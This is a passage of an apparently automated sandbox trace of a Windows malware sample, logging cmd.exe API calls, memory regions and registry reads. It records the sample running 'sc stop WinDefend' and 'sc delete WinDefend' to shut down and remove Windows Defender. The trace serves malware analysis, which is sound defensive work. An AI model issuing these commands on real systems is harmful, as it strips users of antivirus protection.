NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.867] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.868] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.869] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x18ef5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef5c) returned 0x5c4f78 [0128.869] FindClose (in: hFindFile=0x5c4f78 | out: hFindFile=0x5c4f78) returned 1 [0128.869] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x18ef5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef5c) returned 0xffffffff [0128.869] GetLastError () returned 0x2 [0128.869] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x18ef5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef5c) returned 0x5c4f78 [0128.869] FindClose (in: hFindFile=0x5c4f78 | out: hFindFile=0x5c4f78) returned 1 [0128.870] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0128.870] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0128.870] GetConsoleTitleW (in: lpConsoleTitle=0x18f454, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.870] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f2dc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f3a4 | out: lpAttributeList=0x18f2dc, lpSize=0x18f3a4) returned 1 [0128.870] UpdateProcThreadAttribute (in: lpAttributeList=0x18f2dc, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f39c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f2dc, lpPreviousValue=0x0) returned 1 [0128.870] GetStartupInfoW (in: lpStartupInfo=0x18f298 | out: lpStartupInfo=0x18f298*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0128.870] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0128.871] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0128.871] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0128.873] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x18f338*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc stop WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f384 | out: lpCommandLine="sc stop WinDefend", lpProcessInformation=0x18f384*(hProcess=0x78, hThread=0x74, dwProcessId=0xb74, dwThreadId=0xb80)) returned 1 [0128.877] CloseHandle (hObject=0x74) returned 1 [0128.877] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0128.877] GetEnvironmentStringsW () returned 0x5c3f18* [0128.877] FreeEnvironmentStringsW (penv=0x5c3f18) returned 1 [0128.877] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0129.153] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x18f278 | out: lpExitCode=0x18f278*=0x0) returned 1 [0129.153] CloseHandle (hObject=0x78) returned 1 [0129.154] _vsnwprintf (in: _Buffer=0x18f3c0, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f284 | out: _Buffer="00000000") returned 8 [0129.154] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0129.154] GetEnvironmentStringsW () returned 0x5c5208* [0129.154] FreeEnvironmentStringsW (penv=0x5c5208) returned 1 [0129.154] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0129.154] GetEnvironmentStringsW () returned 0x5c5208* [0129.154] FreeEnvironmentStringsW (penv=0x5c5208) returned 1 [0129.154] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f2dc | out: lpAttributeList=0x18f2dc) [0129.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.154] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0129.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.155] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5741ac | out: lpMode=0x4a5741ac) returned 1 [0129.155] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.155] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5741b0 | out: lpMode=0x4a5741b0) returned 1 [0129.155] SetConsoleInputExeNameW () returned 0x1 [0129.155] GetConsoleOutputCP () returned 0x1b5 [0129.155] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0129.155] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.155] exit (_Code=0) Process: id = "18" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4124f000" os_pid = "0x894" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x844" cmd_line = "/c sc delete WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2506 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2507 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2508 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2509 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2510 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2511 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 2512 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 2513 start_va = 0x4a550000 end_va = 0x4a59bfff entry_point = 0x4a550000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2514 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2515 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2516 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2517 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2518 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2519 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2520 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2521 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2522 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2523 start_va = 0x1a0000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2524 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2525 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2526 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2648 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2649 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2650 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2651 start_va = 0x4d0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2652 start_va = 0x75280000 end_va = 0x75286fff entry_point = 0x75280000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 2653 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2654 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2655 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2656 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2657 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2658 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2659 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2660 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2661 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2662 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2663 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2664 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2665 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 2666 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 2667 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2668 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2669 start_va = 0x5d0000 end_va = 0x757fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 2670 start_va = 0x780000 end_va = 0x78ffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 2671 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2672 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2673 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2674 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2675 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2676 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2677 start_va = 0x790000 end_va = 0x910fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 2678 start_va = 0x920000 end_va = 0x1d1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 2679 start_va = 0x1d20000 end_va = 0x2062fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d20000" filename = "" Region: id = 2744 start_va = 0x2070000 end_va = 0x233efff entry_point = 0x2070000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 152 os_tid = 0x898 [0128.680] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x39f934 | out: lpSystemTimeAsFileTime=0x39f934*(dwLowDateTime=0xef32d6b0, dwHighDateTime=0x1d4be3a)) [0128.680] GetCurrentProcessId () returned 0x894 [0128.680] GetCurrentThreadId () returned 0x898 [0128.680] GetTickCount () returned 0x2ca7f [0128.680] QueryPerformanceCounter (in: lpPerformanceCount=0x39f92c | out: lpPerformanceCount=0x39f92c*=1820605200000) returned 1 [0128.681] GetModuleHandleA (lpModuleName=0x0) returned 0x4a550000 [0128.681] __set_app_type (_Type=0x1) [0128.681] __p__fmode () returned 0x75ca31f4 [0128.681] __p__commode () returned 0x75ca31fc [0128.681] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5721a6) returned 0x0 [0128.681] __getmainargs (in: _Argc=0x4a574238, _Argv=0x4a574240, _Env=0x4a57423c, _DoWildCard=0, _StartInfo=0x4a574140 | out: _Argc=0x4a574238, _Argv=0x4a574240, _Env=0x4a57423c) returned 0 [0128.681] GetCurrentThreadId () returned 0x898 [0128.681] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x898) returned 0x60 [0128.681] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76540000 [0128.681] GetProcAddress (hModule=0x76540000, lpProcName="SetThreadUILanguage") returned 0x7656a84f [0128.682] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.682] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.682] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x39f8c4 | out: phkResult=0x39f8c4*=0x0) returned 0x2 [0128.682] VirtualQuery (in: lpAddress=0x39f8fb, lpBuffer=0x39f894, dwLength=0x1c | out: lpBuffer=0x39f894*(BaseAddress=0x39f000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.682] VirtualQuery (in: lpAddress=0x2a0000, lpBuffer=0x39f894, dwLength=0x1c | out: lpBuffer=0x39f894*(BaseAddress=0x2a0000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0128.682] VirtualQuery (in: lpAddress=0x2a1000, lpBuffer=0x39f894, dwLength=0x1c | out: lpBuffer=0x39f894*(BaseAddress=0x2a1000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0128.682] VirtualQuery (in: lpAddress=0x2a3000, lpBuffer=0x39f894, dwLength=0x1c | out: lpBuffer=0x39f894*(BaseAddress=0x2a3000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.682] VirtualQuery (in: lpAddress=0x3a0000, lpBuffer=0x39f894, dwLength=0x1c | out: lpBuffer=0x39f894*(BaseAddress=0x3a0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x130000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0128.682] GetConsoleOutputCP () returned 0x1b5 [0128.682] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0128.682] SetConsoleCtrlHandler (HandlerRoutine=0x4a56e72a, Add=1) returned 1 [0128.682] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.683] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0128.683] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.683] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5741ac | out: lpMode=0x4a5741ac) returned 1 [0128.683] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.683] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.683] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.683] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5741b0 | out: lpMode=0x4a5741b0) returned 1 [0128.683] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.683] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0128.684] GetEnvironmentStringsW () returned 0x4e1f50* [0128.684] FreeEnvironmentStringsW (penv=0x4e1f50) returned 1 [0128.684] GetEnvironmentStringsW () returned 0x4e1f50* [0128.684] FreeEnvironmentStringsW (penv=0x4e1f50) returned 1 [0128.684] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e834 | out: phkResult=0x39e834*=0x68) returned 0x0 [0128.684] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e83c, lpData=0x39e840, lpcbData=0x39e838*=0x1000 | out: lpType=0x39e83c*=0x0, lpData=0x39e840*=0x0, lpcbData=0x39e838*=0x1000) returned 0x2 [0128.684] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e83c, lpData=0x39e840, lpcbData=0x39e838*=0x1000 | out: lpType=0x39e83c*=0x4, lpData=0x39e840*=0x1, lpcbData=0x39e838*=0x4) returned 0x0 [0128.684] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e83c, lpData=0x39e840, lpcbData=0x39e838*=0x1000 | out: lpType=0x39e83c*=0x0, lpData=0x39e840*=0x1, lpcbData=0x39e838*=0x1000) returned 0x2 [0128.684] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e83c, lpData=0x39e840, lpcbData=0x39e838*=0x1000 | out: lpType=0x39e83c*=0x4, lpData=0x39e840*=0x0, lpcbData=0x39e838*=0x4) returned 0x0 [0128.684] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e83c, lpData=0x39e840, lpcbData=0x39e838*=0x1000 | out: lpType=0x39e83c*=0x4, lpData=0x39e840*=0x40, lpcbData=0x39e838*=0x4) returned 0x0 [0128.684] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e83c, lpData=0x39e840, lpcbData=0x39e838*=0x1000 | out: lpType=0x39e83c*=0x4, lpData=0x39e840*=0x40, lpcbData=0x39e838*=0x4) returned 0x0 [0128.684] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e83c, lpData=0x39e840, lpcbData=0x39e838*=0x1000 | out: lpType=0x39e83c*=0x0, lpData=0x39e840*=0x40, lpcbData=0x39e838*=0x1000) returned 0x2 [0128.684] RegCloseKey (hKey=0x68) returned 0x0 [0128.684] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e834 | out: phkResult=0x39e834*=0x68) returned 0x0 [0128.685] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e83c, lpData=0x39e840, lpcbData=0x39e838*=0x1000 | out: lpType=0x39e83c*=0x0, lpData=0x39e840*=0x40, lpcbData=0x39e838*=0x1000) returned 0x2 [0128.685] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e83c, lpData=0x39e840, lpcbData=0x39e838*=0x1000 | out: lpType=0x39e83c*=0x4, lpData=0x39e840*=0x1, lpcbData=0x39e838*=0x4) returned 0x0 [0128.685] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e83c, lpData=0x39e840, lpcbData=0x39e838*=0x1000 | out: lpType=0x39e83c*=0x0, lpData=0x39e840*=0x1, lpcbData=0x39e838*=0x1000) returned 0x2 [0128.685] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e83c, lpData=0x39e840, lpcbData=0x39e838*=0x1000 | out: lpType=0x39e83c*=0x4, lpData=0x39e840*=0x0, lpcbData=0x39e838*=0x4) returned 0x0 [0128.685] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e83c, lpData=0x39e840, lpcbData=0x39e838*=0x1000 | out: lpType=0x39e83c*=0x4, lpData=0x39e840*=0x9, lpcbData=0x39e838*=0x4) returned 0x0 [0128.685] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e83c, lpData=0x39e840, lpcbData=0x39e838*=0x1000 | out: lpType=0x39e83c*=0x4, lpData=0x39e840*=0x9, lpcbData=0x39e838*=0x4) returned 0x0 [0128.685] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, 